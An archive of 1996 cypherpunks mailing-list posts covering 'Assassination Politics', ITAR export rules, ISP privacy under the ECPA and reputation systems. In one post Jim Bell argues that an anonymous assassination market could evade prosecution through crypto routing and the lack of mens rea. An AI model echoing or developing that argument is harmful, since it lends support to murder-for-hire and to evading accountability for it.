Date: Wed, 25 Sep 1996 22:10:48 +0800
To: cypherpunks@toad.com
Subject: Re: SAY WHAT? [Assassination NOISE]
Message-ID: <199609250730.AAA25890@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An earlier generation of Assassination Politics set the public's
stereotype view of "anarchists" for the next hundred years.
Do we really want to do it again?  Perhaps the public will
realize that we're not lefty-anarchists, we're the
Totally Unified Cypherpunk Anarcho-Capitalist Movement...

Someone, probably Simon Spero <ses@tipper.oit.unc.edu> said:
>= .Assasination politics is  impossible to defend from a classical 
>= .Liberal/Libertarian position.  Bell advocates arbitrary applications
>= .of violence and coercion without restriction.  There is no way to
>= .justify the initiation of force without abandoning any pretence of
>= .being a Libertarian (which, to be fair, Bell doesn't claim to be).

Bell, like X, is proposing mechanism without built-in policy, 
as well as suggesting some potential policy implementations.  If you use 
the mechanism to sponsor assassination of people who have initiated force
against you, you're only using retaliatory force, not initiating it.

On the other hand, the mechanism also can be used against people who
haven't initiated force against the sponsor - even against politicians
who have refused to get the country into misguided but popular wars
or judges who have refused to convict innocent but wrong-colored defendants.
Like democracy, it's a really terrible system, and like democracy,
there are some alternatives that aren't worse :-)  Maybe even democracy.
It's at least as appalling an idea as government.

If it does catch on, and I suspect that the technology will certainly
make it possible, I hope that most of the public will have enough sense 
and decency not to pay for murdering people who don't deserve it,
so assassins will find more of a market for killing people who do,
and that the lower-paid assassins who kill undeserving people will
be less competent and get caught like most stupid bank robbers do.

But there are enough Drug-War-Loving Americans that I doubt it.
And there's enough intersection between the morality-challenged
and the financially-challenged fellow Americans down on their luck
that some of them will take a break from robbing liquor stores for
drug money to make bigger bucks serving the desires of the public
that the high-tech lynch mobs will have people they can hire.
Not everybody needs Mario Greymist to get some basic "work" done.
Glory of the market, matching up supply and demand.

And attila replied
>        all very true.  but I will defend Jim Bell's rights to propose
>    them, even if Bell is more than a few cards short of a full deck.

Sure, he's got the right to, and if I run a remailer again he's welcome
to use it to discuss AP (though not to propose assassinations....)
Doesn't mean I want to encourage this sort of thing, though.
Remailers can damn well afford to be choosy, and I'll bet
5 zorkmids that the first person to use my remailer for assassination
doesn't last a month. (Oh, wait...)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 25 Sep 1996 19:53:26 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <199609250755.AAA14065@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 PM 9/24/96 -0400, Brian Davis wrote:
>On Tue, 24 Sep 1996, Rich Burroughs wrote:
>
>> <AP stuff>
>> Anyone who mistakes the lack of "repudiations" for AP on the list for some
>> kind of tacit approval is not getting the whole picture, IMHO.  
>> 
>> Is this how journalists do their research nowadays -- "give me some info or
>> I'll write something really bad about you that you'll regret?"  Cool.  I
>> guess I thought there might still be some kind of pursuit of the truth
>> involved.
>> 
>> I personally don't have the time or energy to contribute to the AP threads.
>> That != approval for the idea.
>> 
>> I hope you include your above quote in your piece.
>> 
>
>Amen to that.  Add that at least one lawyer (and former prosecutor) on 
>the list is confident that successful prosecutions will ensue is AP ever 
>gets off the ground. 

I don't doubt that there will be harassment.  (you can't deny that charges 
would be brought even if it is tacitly agreed that no crime has been 
committed; "the harassment-value" of such a prosecution would be desired 
even if there is ultimately an acquittal.)  AP will resemble, more than 
anything, gambling.  While gambling is illegal in some areas, it is quite 
legal in others and there is no reason to believe that locales can't be 
found in which an AP system could operate legally.

Make American laws apply everywhere?  That'll be hard to justify, unless you 
want to unleash a world where an all people can be subject simultaneously to 
the laws of EVERY country, should they choose to enforce them!  Would you 
like to be arrested in Red China for something you said years earlier in 
America about their leadership? 

 And are you ignoring the fact that the intentional isolation of one 
participant from the knowledge of the actions and even the identity of the 
others makes opportunities for prosecution on "conspiracy" charges mighty 
slim.  And since AP can operate across traditional jurisdictional 
boundaries, you're going to have to explain how you can prosecute Person A 
in Country B for giving a donation to an organization in Country C, to be 
paid to a person D in country E for correctly predicting the death of person 
F in country G, particularly when none of the identities of these people or 
countries can be easily known given a well-crafted cryptographic and 
message-routing system.  

  Further, as you probably know as well as any, in order (at least, 
supposedly!) to get a conviction you need to prove "mens rea," or "guilty 
mind," and I suggest that none of the more passive participants in the AP 
system have that.  (The ones who DON'T pick up a gun, knife, bomb, poison, 
etc.)  Sure, they are aware that somewhere, sometime, somebody _may_ commit 
a crime in order to collect a lottery, but they don't know who, what, when, 
where, or how this will occur, if at all. (either before or after the fact!) 
  In fact, since it is possible for a target to collect the reward himself 
(to be directed toward his designee, obviously) by committing suicide and 
"predicting" it, it isn't certain to the other participants that there has 
even been any sort of crime committed!

Based on the mens rea requirement, I propose that there is plenty of room 
for most of the participants to reasonably claim that they are guilty of no 
crime.  They have carefully shielded themselves and others from any guilty 
knowledge, and presumably they are entitled to protect themselves in this 
way.  Morally, you could argue that these people are countenancing something 
nasty, in the same sense that somebody could equally well argue that if you 
buy a cheap shirt in Walmart you're partly responsible for sweatshop labor 
in El Salvador.  True, I suppose, but moral guilt does not always translate 
into legal guilt.


> And yes, I've read Jim Bell's manifesto.  The fact 
>that no lawyer has dissected it from a legal standpoint has been used by 
>Mr. Bell as support for the propostion that it is legal.

I suggest that there is a greater likelihood that the "powers that be" will 
just abandon all pretense of legality, and attempt to strike at the 
participants if they can find them without benefit of any sort of trial. 
This is a more plausible conclusion, because it cuts through all of the 
legal difficulties which would hinder prosecution.  In effect, a low-level 
undeclared war.  


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Sep 1996 19:11:40 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <Pine.A32.3.91.960924125437.13006A-100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.BSF.3.91.960925011334.18469d-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996 s1113645@tesla.cc.uottawa.ca wrote:

> 
> 
> On Sun, 22 Sep 1996, Jim McCoy wrote:
> 
> > Brian Davis <bdavis@thepoint.net>
> > [...]
> > >Constitutional literalists take note:  the First Amendment says nothing
> > >about what the executive branch or the states can do ....
> Doesn't the doctrine of limited powers mean that they cannot do what is not
> specified? (If I'm not mistaken, IANAL, etc...)
>  

If so, why would we need the First Amendment to protect us from Congress 
regulating speech? [etc.]  

And, in any event, the limited powers argument 
wouldn't apply to the states:  "The powers not delegated to the United 
States by the Constitution, nor prohibited by it to the States, are 
reserved to the States respectively, or to the people."

EBD


> > The states are prohibited through the 14th Amendment via the
> > Slaughterhouse cases, the ability of the executive branch to
> > violate due process is questionable (from a legal viewpoint, not
> > a practical one...the President cannot order you placed in jail
> > unless you have broken a law which requires congress to have
> > made the law in the first place...)
> 
> And the ITARs are only executive orders, no? Not laws, right? I'm curious 
> as to why they're considered valid. Anyone know?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregburk@netcom.com (Greg Burk)
Date: Wed, 25 Sep 1996 18:47:35 +0800
To: cypherpunks@toad.com
Subject: Not reputation again! (Was: The Nature of the Cypherpunks List)
Message-ID: <54f2rzdf7l@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I know, I said I was through arguing "reputation theory" and I really
thought I was, but this latest impelled me to say more.
 
tcmay@got.net (Timothy C. May) writes:
> --Tim May, whose reputation is, like the list, whatever it is, for whatever
> reasons, and who thus needs no defenders
 
Indeed, your reputation needs no defenders among those of us who know
you directly (if electronically)
 
But here's something for you to think over: If there are such things as
negative reputations, why hasn't your reputation zoomed to godlike
status upon the ... let us say unreserved... condemnations of the
Poster With Nothing Better To Do, if s/he has a negative reputation (I
presume you would say so)
 
You could contend that his/her reputation is positive, but if that's
positive, what isn't? This would appear to concede my point.
 
You could contend that the Poster With Nothing Better To Do's reputation
is balanced precariously at exactly 0. I would find that a big stretch,
and as above, if that's 0, what's negative?
 
Or you could contend that there's no such thing as collective
reputation, but I think there are two major flaws: His/her 1-to-1
"reputations" clearly add up to a collective consensus among us annoyed
cpunk readers. Even if you contend that reputations in general do not
behave collectively, it is no defense in this case at least. And I think
if "reputation theory" predicts no collective behavior, it must be
pretty weak.
 
 
> But there comes a point where I need to speak up. (By the way, somebody
> even sent me a bizarre message, saying: "I am not quite sure why you have
> not shot back at Dr Virmin and his cause. Maybe that is the best way? Or
> are you guilty as charged?" So, to some, my silence means I might be
> guilty. Jeesh.)
 
Because s/he can *never spend reputation down to zero*.
 
BTW, your example is reflected in politics too. A charge that goes
unanswered is assumed true by many. Just ask Michael Dukakis.
 
 
Frankly, I think you should just admit that your reputation theory is
flawed and rethink it. I would be interested in hearing it, but what you
have now is IMHO badly flawed.
 
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQBVAwUBMkjPErMyVAabpHidAQFmVAH/XJ8GqayxiJOKv/5obx7MPcFX9VUJSldJ
M/Vh4OBN3PYytw8TKvzxwcvJAqCjSA7AfZZZAgzfb9UMCetR4wZv8g==
=5HgH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 25 Sep 1996 23:54:10 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Lexis and Privacy - Bill approaches.
In-Reply-To: <Pine.SUN.3.94.960924190706.9902A-100000@polaris>
Message-ID: <Pine.SUN.3.91.960925050416.10072A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


This would be good if the bills were written well and thoughtfully. 
Unfortunately, they explicitly extend executive branch regulatory
jurisdiction to the Net. At least the one I read did; I understand there
are multiple versions. 

-Declan


On Tue, 24 Sep 1996, Black Unicorn wrote:

> 
> Pressure from the FTC Which fielded hundreds of complaints about Lexis and
> the social security number scrap) has prompted members of the Banking
> Committee to add provisions to the most recent spending bills which
> protect personal information (including social security numbers, phone
> numbers, addresses, and so forth) under the Fair Credit Reporting Act.
> This limits access to this information to credit agencies and otherwise
> authorized entities.  (Of which I assume Lexis is not one).
> 
> It's not great protection, but it's something.
> 
> I urge everyone to take their own measures to protect personal data
> regardless of what some piece of paper on a library shelf says is
> protected.  The only real protection is not to allow release of the data
> in the first place.
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 25 Sep 1996 17:32:37 +0800
To: cypherpunks@toad.com
Subject: The Iron Lady almost on target
Message-ID: <199609250528.XAA03556@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


The Iron Lady launched into an attack against government regulations, 
political correctness, and a licentious socity.  

Let's run her for President.  she couldn't be any worse than Bubba or 
Dolt --and she might terrorize half or more Washington. 

    ------  Forwarded ------
London Daily Telegraph for 25 Sep 95

<HTML>
<Head>
<Title>Thatcher hits out at moral 'corrosion' [Anonymized]</Title>
</Head>
<Body bgcolor=ffffff  text=000040 link=ff0000 vlink=7080f0
alink=ff0000><H1 ALIGN=center>

LADY Thatcher spoke out against the "licentiousness" of the permissive
society last night and said that children were being brought up in a
morally corrosive atmosphere.</summary><p>

The former Prime Minister expressed her distaste for the coarsening of
popular culture in a lecture in London which praised the enduring
values and institutions of American civilisation.  On the day in which
the annual crime figures showed the first overall increase in Britain
for several years, she also lamented the steady decline in law and
order which had rendered everyone "less secure than we of a right
should be".<p>

She said:  "From the most heinous acts of terrorism to the petty
burglar and street corner mugger, we are confronted by those for whom
words such as 'justice' and 'right' have no meaning.  We see around
ourselves the licentiousness of modern society manifested in popular
culture.  We have witnessed a coarsening of everything from art to
music to literature and film.  But for some people there seems to be
nothing beyond the pale, for them freedom has no limits."<p>

Lady Thatcher did not specify the targets of her criticism, but went
on to accuse those who advocated unrestrained freedom of expression as
perverse, demeaning and dangerous.  She said:  "The younger generation
is being reared in a morally corrosive atmosphere where they are
taught that in the name of liberty, anything goes.  There is no
elevation of the human spirit in works designed merely to shock or to
appeal only to our most base instincts."<p>

Lady Thatcher's vigorous defence of the rule of law reprised a
familiar theme from her period of office in Downing Street, when the
Conservatives were themselves accused of fuelling the rise in
lawlessness by putting too great an emphasis on individualism.<p>

However she did not refer to the present Government and its internal
difficulties at all, except to warn in passing of what she saw as the
dangers posed by the Labour Party or bureaucrats in Brussels.  She
said:  "If we should be enticed once more down the rutted and muddy
road of socialism, we will again find Britain mired in a morass of
stifling regulations and government controls."<p>

In a sustained attack on state-enforced egalitarianism, Lady Thatcher
also hit out at the fashion for political correctness as "the guiding
sentiment of tyrants in every age" who believed that if they
controlled what people read, they controlled the people themselves.<p>

Delivering the inaugural James Bryce lecture for London University's
Institute of United States Studies, Lady Thatcher called for more
serious study of the history and culture of America to understand the
exceptional role the US had played in world affairs.  It had served as
a beacon of enlightenment in the struggles against German imperialism,
fascist aggression and communist tyranny during this century, and
would dominate the next.<p>

She said:  "We are confronted by a stream of dictators and tyrants who
will seek to dominate those nations around them, if not the entire
world.  The deepest conflicts between men will not subside, nor can
they subside until the basic principles of individual liberty and
political freedom are embraced throughout the world."<p>

Lady Thatcher said that too much talk of "rights" was in danger of
overwhelming the importance of duty and responsibility in a free
country.  She said:  "In the process, liberty decays into licence in
an atmosphere where all is permitted and nothing prohibited.  The
resulting permissive society is in fact no society at all.  It is
little more than a state of nature where the line between right and
wrong is first blurred and then obliterated - a place where no one
dares to say no.  There can be no order without authority, and
authority that is impotent or hesitant in the face of intimidation,
crime and violence, cannot endure."<p>

She challenged the modern assumption that progress was the general
rule and corruption the exception.  Often, it was the other way
around.  "Freedom and civilisation are conditions that require great
effort, deep thought, and unwavering commitment," she said.<p>

</body>
</html>








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Sep 1996 23:48:04 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: ISPs' information on users
In-Reply-To: <ae6df1260502100417f8@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960925052343.10133A-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Timothy C. May wrote:

> At 8:18 PM 9/24/96, Robert Hettinga wrote:
> >--- begin forwarded text
> 
> >>  ** So Much Fuss About A Bottle Of Ketchup
> >>
> >>  Hungarian police recently sent a fax around to the local Internet
> >>  service providers (ISPs) asking them to provide lists of their users
> >>  in Esztergom, a small town outside of Budapest. It seems somebody
> >>  had planted a bomb in a bottle of ketchup. Since everyone knows you
> >>  can download bomb-making instructions from the Internet, the police
> >>  figured they should investigate the local users. No, I'm not making
> >>  this up.
> 
> So, Hungary has GAK -- Government Access to Ketchup.
> 
> Good to know the 57 Varieties are now considered munitions.
> 
> On a more serious note, perhaps legal experts here could comment on
> something I've been wondering about. Could ISPs in the UlS. be compelled to
> report on the browsing and net surfing habits of their customer base?
> 
> To make this clear, I don't mean in a specific criminal case, where the
> records are searchable under a warrant. I mean a blanket order that all
> ISPs compile and forward records.
> 
> Were I an ISP, I would probably say, "Hell no! They're my records and the
> Fourth Amendment says my records are to be secure unless a proper court
> order is issued. Besides, my fee for generating each kilobyte of records is
> $100,000, nonnegotiable."
> 
> (I think I've answered my own question, namely, ISPs would be under no
> obligation to report on customer activities, absent a proper warrant, and
> consistent with the ECPA.)
> 
> However, ISPs are _not_ accorded the same status as priests, lawyers, and
> others with such privacy privileges (and obligations). Would it be legal
> for an ISP to offer for sale such records? Or to voluntarily go to the
> cops?


Worse for the ISP (and better for its customers), such interception would 
violate ECPA, as the 18 U.S.C. Section 2511(2)(a)(i) exception for 
interceptions by electronic communications services would not apply to 
protect the ISP.  One could hardly (successfully) argue that selling out 
its customers was a "necessary incident" to the rendition of the ISP's 
services.  Indeed, the exception also states "that a provider ... shall 
not utilize service observing or random monitoring except for mechanical 
or service quality control checks.

I know.  They could use the exception to give away a little bit, but not 
the whole enchilada.

EBD


> 
> (There's a certain new ISP with tight links to a quasi-religious group much
> in the news lately, and some have speculated that this ISP may be
> monitoring certain users....)
> 
> --Tim May
> 
> 
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Sep 1996 21:14:35 +0800
To: adamsc@io-online.com
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <19960925054434656.AAA117@IO-ONLINE.COM>
Message-ID: <199609251126.GAA10877@homeport.org>
MIME-Version: 1.0
Content-Type: text


Adamsc wrote:

| >Theres a personal use exemption.  Michael Froomkin's web page has a
| >pointer to it.
| 
| What if your laptop gets "stolen"?  Or you sell it for a plane ticket home
| after your wallet gets pinched?

You're required to report it to the Feds.  RTFU.

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: T Bruce Tober <octobersdad@reporters.net>
Date: Wed, 25 Sep 1996 20:50:52 +0800
To: lacc@suburbia.net
Subject: LACC: Encryption and Japan
In-Reply-To: <199609240206.WAA20711@raptor.research.att.com>
Message-ID: <eJil5iAfcMSyEwiD@reporters.net>
MIME-Version: 1.0
Content-Type: text/plain


A few months ago I read an article concerning one of the encryption
gurus (other than PZ) setting up a company in Japan to create a new
encryption program as good as or better than PGP which since it was
developed in Japan, wouldn't be subject to ITAR. 

Actually I think the article indicated he'd already set up the company
and developed the software and was getting ready to market it. 

I think it was Diffie, but can't remember and can't find any info on it.
Does anyone here have any info, leads or contact details they can
provide me?


tbt
-- 
| Bruce Tober - octobersdad@reporters.net - Birmingham, England            |
| pgp key ID 0x9E014CE9. For CV/Resume:http://pollux.com/authors/tober.htm |
| For CV/Resume and Clips: http://nwsmait.intermarket.com/nmfwc/tbt.htm    |
|                                                                          |
| "Just as the strength of the Internet is chaos, so the strength of our   |
| liberty depends upon the chaos and cacophony of the unfettered speech the|
| First Amendment protects." -- three wise federal judges                  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@Hrnowl.LoneStar.ORG>
Date: Wed, 25 Sep 1996 18:09:37 +0800
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Re: ISPs' information on users
In-Reply-To: <ae6df1260502100417f8@[207.167.93.63]>
Message-ID: <3248cca9.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On a more serious note, perhaps legal experts here could comment on
> something I've been wondering about. Could ISPs in the UlS. be compelled to
> report on the browsing and net surfing habits of their customer base?
> 
> To make this clear, I don't mean in a specific criminal case, where the
> records are searchable under a warrant. I mean a blanket order that all
> ISPs compile and forward records.

Lets get some of the cypherpunk legal types to comment on the
following idea which is probably completely wrong:

It is probably illegal for the ISP to keep such records in the first
place!

When I open a link to a remote WEB page or use FTP to retrieve
a remote file, the software on my computer first forms a network
connection between a program on my local computer and a remote
"server" program at the remote site. 
The ISP provides hardware and software "in the middle" that allows
this connection to take place. After this connection is established,
the connection itself is used to negotiate the precise data I want (i.e.
the filename in the case of FTP or the non-site portion of the URL in
the case of the WEB). In order for the ISP to keep records of my 
browsing, it would have to snoop on this connection. But the connection
is an electronic communication within the meaning of the Electronic
communications privacy act (ECPA). Thus it is not legal for the ISP
to keep such information. Thus the ISP can not report on the
browsing habits and net surfing habits of its user base by complying
with the law and never keeping the records in the first place. Perhaps
the above does not apply to the site name of the connections.

OK, cypherpunk legal types, tell me if I got the above wrong?

-- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 25 Sep 1996 23:01:12 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <3.0b19.32.19960924160043.006edf48@ricochet.net>
Message-ID: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles writes in a most informative posting:

: And that's what the ITAR is - a body of administrative law developed by the
: executive branch pursuant to a grant of power from Congress. (e.g., 22 USC
: 2778(a)(1), ". . . The President is authorized to designate those items
: which shall be considered as defense articles and defense services for the
: purposes of this section and to promulgate regulations for the import and
: export of such articles and services. The items so designated shall
: constitute the United States Munitions List.") It is subject to review by
: the courts just like the product of Congress itself; and an agency can't do
: something Congress can't do, like write an unconstitutional law.

It should be added though that most administrative regulations are
subject to judicial review by courts to make sure that they comply with
the law passed by Congress.  The ITAR, on the other hand, are not
subject to this sort of review and can only be challenged in the courts
on Constitutional grounds.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
                     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 25 Sep 1996 23:44:35 +0800
To: tcmay@got.net (Timothy C. May)
Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) )
In-Reply-To: <ae6e375801021004b001@[207.167.93.63]>
Message-ID: <199609251219.OAA28483@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

It's silly to conflate ratings of people with ratings of
people's opinions with ratings of people's ratings of etc.


Some of the people I work with have awful opinions on politics,
other people, music, movies, books, and food, but great opinions
on computer hardware, algorithms and programming languages.


But their ratings as people are generally very high.


(Insert inaccurate but amusing joke to the effect that if 
someone has good taste in restaurants they are likely to have 
poor taste in video cards, or some such.)


Check out Firefly (www.ffly.com).  (Cpunk comment:  they only
track your ratings by nym, no True Name required.)


Firefly has the "if I agreed with Bob a lot in the past on this
subject, I'll probably agree with him again" heuristic.  It
appears to be a pretty ugly heuristic when applied to me.  Ffly
keeps trying to suggest music which is in the same _genre_ as 
music I have previously recommended, but what I am interested is
music that is similarly _good_.  My tastes don't correspond well
to genres.


But this is a mere anecdotal impression.  Give it a spin.  


I wrote in the suggestion box that they add meta-ratings
(especially ratings on the little "movie reviews" submitted by
other FFly users).  Some guy wrote back (same day!) that they
were planning on it.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM
XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb
fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C
=rL1w
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 04:05:36 +0800
To: bryce@digicash.com
Subject: Re: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature ofthe Cypherpunks List) )
Message-ID: <ae6eb045000210048359@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


As Bryce addressed this to me as the primary recipient, I have to assume
he's ascribing these ideas to me.

At 12:19 PM 9/25/96, bryce@digicash.com wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>It's silly to conflate ratings of people with ratings of
>people's opinions with ratings of people's ratings of etc.
>
>
>Some of the people I work with have awful opinions on politics,
>other people, music, movies, books, and food, but great opinions
>on computer hardware, algorithms and programming languages.
...

I never said there is going to be a simple scalar rating. In my last major
post on this, several weeks ago, I even elaborated, saying that even
Alice's rating of Bob, for example, would have multiple components, such as
her rating of his taste in movies, his taste in restaurants, his political
beliefs, his technical expertise, etc.


This area is complicated enough to talk about with
oversimplifying-and-then-critiqueing. These are usually called "straw man"
arguments.


--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 10:09:17 +0800
To: cypherpunks@toad.com
Subject: Re: Medical Data
Message-ID: <ae6eb49d0302100488aa@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 PM 9/25/96, Phil Fraering wrote:
>Of course, one area where the doctor will continue to hold a patient's
>records, instead of the patient, due to the nature of the current system:
>
>Prescription medication.
>

Digitally signed prescriptions from qualified doctors.

(Not that I support this system...I rather like the "anarchy" of Mexico,
where one walks into a pharmacy in Tijuana and can buy purt near anything).

>Of course, with the really big problems with this stuff, drug
>interactions, there's still no system for a doctor to find out what you're
>on thanks to another doctor. Which is why it's very important to always
>use the same pharmacist.


The lesson of the last decade has been that _interested patients_ often do
more research about their conditions and various drug effects than their
doctors can. (This happened with a friend of mine, who ultimately died, and
a similar case was recently detailed about Andy Grove, of Intel, who did
exhaustive research on the Net about his condition...making him (finally) a
real user of the Net. There was also a movie, "Lorenzo's Oil," about this
exact situation.)

In any case, the issue of which drugs one may be taking and maintenance of
"drug interaction databases" is not a core issue. One can selectively
release the list of drugs being considered to an "oracle" machine, and
check for dangerous interactions. Or tell the physician, which is certainly
no worse than the current situation.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 09:34:57 +0800
To: cypherpunks@toad.com
Subject: Re: ISPs' information on users
Message-ID: <ae6eb64e04021004ee53@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:43 PM 9/25/96, Phil Fraering wrote:
>On Tue, 24 Sep 1996, Timothy C. May wrote:
>
>> (There's a certain new ISP with tight links to a quasi-religious group much
>> in the news lately, and some have speculated that this ISP may be
>> monitoring certain users....)
>>
>> --Tim May
>
>Which ISP and religious group is this?

Just why do you think I was elliptical in my comments? To type three lines
instead of just typing the name? Think about it.

With Webcrawlers looking for names of organizations--and the Cypherpunks
archives show up on such searches--and with some organizations being very
quick to sue for perceived defamation....

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 09:52:28 +0800
To: cypherpunks@toad.com
Subject: Re: Where to write crypto?
Message-ID: <ae6eb71a050210041e74@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:05 PM 9/25/96, s1113645@tesla.cc.uottawa.ca wrote:

>Why go so far, when you can export crypto from Anguila or Canada. The
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>first is right next to Florida and is a tax haven, the second has a large
>talent pool and the same qulity telecom as the States. The main problem is
>concealing the fact that there may be any Americans involved. Both save
>you the trouble of learning Chinese.

Are you _sure_ about what you say about Canada? After all, in nearly all
defense- and crypto-related matters, they are essentially the 51st State.
In fact, Canada is one of the places crypto may be exported _to_ from the
U.S. without any license. So, export strong crypto into Canada and then
invoke the "you can export crypto from...Canada" clause?

I don't think so.

As to Anguilla, I fear it's too small an island and too tightly controlled
by the Ruling Families, who will take action if the boat gets rocked
enough. The recent experiences with Vince essentially repudiating certain
policies he had publically announced have left his experiment with not a
lot of "backbone" (no pun intended). As Vince said, paraphrasing his
comments, the government of Anguilla will take steps to stop things which
cast the island in a bad light. Not much of a haven, eh?

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
